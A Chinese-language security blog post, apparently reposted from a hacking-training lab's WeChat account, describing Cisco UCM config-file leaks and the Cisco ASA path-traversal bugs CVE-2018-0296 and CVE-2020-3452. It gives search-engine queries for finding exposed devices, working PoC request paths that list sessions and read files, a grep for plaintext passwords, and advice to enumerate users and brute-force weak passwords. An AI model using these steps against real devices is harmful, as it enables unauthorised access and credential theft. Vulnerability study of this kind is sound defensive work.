cisco设备信息泄漏漏洞案例【二】

admin 2022年10月28日22:30:54评论83 views字数 2739阅读9分7秒阅读模式

前言

上一篇文章介绍了cisco路由器设备的2个漏洞案例,这次补充cisco ip电话设备和安全设备的漏洞案例。

CISCO-UCM ConfigFileCacheList.txt 泄漏

CISCO-UCM 全称Cisco Unified Communications Manager,是用于集成CISCO的语音视频通话、消息传递和移动协作的基础设施

部分 CUCM 服务器在端口 TCP/6970 上有一个 HTTP 服务,其中存在 ConfigFileCacheList.txt 文件,包含位于 TFTP 目录中的所有文件名.

fofa语句

product=="CISCO-UCM"

shodan语句

http.html:"Cisco Unified Communications Manager"

payload

x.x.x.x:6970/ConfigFileCacheList.txt

在目标文件中包含了许多SEP开头的文件,那是ip电话的配置文件,sep后面接的是mac地址

cisco设备信息泄漏漏洞案例【二】
Untitled

可以遍历下载这个ConfigFileCacheList.txt文件内容中的所有文件

cisco设备信息泄漏漏洞案例【二】
Untitled

在下载的配置文件中,包含ip,描述,端口等配置信息

cisco设备信息泄漏漏洞案例【二】
Untitled

甚至有的还会包含明文的账号密码

cisco设备信息泄漏漏洞案例【二】
Untitled

可以用egrep批量查找

egrep -r 'Password' *.xml
cisco设备信息泄漏漏洞案例【二】
Untitled

在配置文件中获得了账号密码后,可以尝试登录UCM的web后台

cisco设备信息泄漏漏洞案例【二】
Untitled

当然这个 ConfigFileCacheList.txt 泄漏比较少见,如果遇到UCM可以试试访问/cucm-uds/users路径,可以泄漏用户名信息,再针对用户名进一步爆破弱口令

cisco设备信息泄漏漏洞案例【二】
Untitled

CVE-2018-0296 Cisco ASA 目录遍历漏洞

Cisco ASA是思科的防火墙设备,一般用于在企业边界,包含了ips,avc,wse等应用功能。

fofa语句

app="CISCO-ASA-5520"

根据文章 https://www.anquanke.com/post/id/171916 中的描述,CVE-2018-0296在不同型号设备上存在2种利用场景,一种是拒绝服务造成设备崩溃重启,一种是目录遍历获得敏感信息

在修复方案中则是增加了对./../的处理逻辑,以防止目录遍历

拒绝服务这里就不具体测试了,主要看下目录遍历的利用

检测poc

/+CSCOU+/../+CSCOE+/files/file_list.json
cisco设备信息泄漏漏洞案例【二】
Untitled

注意,类似的poc不能在浏览器里直接粘贴访问,因为浏览器会自动将访问的路径类似/../解析为上一级目录,也就是访问的为/+CSCOE+/files/file_list.json

列出 /sessions 目录的内容

/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
cisco设备信息泄漏漏洞案例【二】
Untitled

提取登录用户的登录信息

/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/[name]
cisco设备信息泄漏漏洞案例【二】
Untitled


CVE-2020-3452 Cisco ASA 目录遍历漏洞

CVE-2020-3452漏洞可以在未验证的情况下进行任意文件读取

该漏洞源于 ASA 和 FTD 的 web 服务接口在处理 HTTP 请求的 URL 时缺乏正确的输入验证,导致攻击者可以在目标设备上查看系统内的web目录文件。

此漏洞不能用于获取对 ASA 或 FTD 系统文件或底层操作系统 (OS) 文件的访问,所以只能读取 web 系统目录的文件,比如 webvpn 的配置文件、书签、网络 cookies、部分网络内容和超文本传输协议网址等信息。

作者在推特分享的检测poc

/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

读取 /+CSCOE+/portal_inc.lua 文件

cisco设备信息泄漏漏洞案例【二】
Untitled

至于进一步利用,有研究人员给出了一些已知文件列表

https://raw.githubusercontent.com/3ndG4me/CVE-2020-3452-Exploit/master/cisco_asa_file_list.txt

不过实际测试,除了session.js 跑出了一个乱码的内容以外,其他的文件多是一些资源文件,难以进一步利用。


Source & Reference

  • • https://www.cisco.com/c/en/us/support/docs/unified-communications/unified-communications-manager-callmanager/200408-Retrieve-Phone-Configuration-File-from-T.html

  • • https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86

  • • https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/

  • • https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/

  • • https://www.anquanke.com/post/id/171916

原创稿件征集

征集原创技术文章中,欢迎投递

投稿邮箱:[email protected]

文章类型:黑客极客技术、信息安全热点安全研究分析安全相关

通过审核并发布能收获200-800元不等的稿酬。


更多详情,点我查看!

cisco设备信息泄漏漏洞案例【二】
靶场实操,戳“阅读原文“

原文始发于微信公众号(合天网安实验室):cisco设备信息泄漏漏洞案例【二】

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月28日22:30:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   cisco设备信息泄漏漏洞案例【二】http://cn-sec.com/archives/1377998.html

发表评论

匿名网友 填写信息